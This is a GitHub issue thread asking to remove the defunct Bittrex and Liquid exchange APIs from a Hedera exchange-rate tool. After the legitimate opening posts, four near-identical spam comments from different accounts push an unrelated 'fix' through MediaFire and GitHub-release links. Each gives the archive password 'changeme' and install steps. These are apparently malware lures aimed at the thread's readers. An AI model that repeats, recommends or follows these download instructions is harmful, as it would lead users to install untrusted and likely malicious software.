### ISSUE TITLE
Remove Bittrex and Liquid APIs

### ISSUE THREAD

**Issue by dubgeis** [hashgraph/hedera-exchange-rate-tool#205]
**Summary of the defect**
Bittrex and Liquid are no longer operational exchanges, remove or replace APIs and references to defunct APIs or services in Exchange Rate tool

**Additional Context**
Suggest seeing if Bitstamp and Crypto.com as more stable price feeds with sufficient volumes

**Comment by dubgeis** [comment]
@Neeharika-Sompalli Sharing as an FYI

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
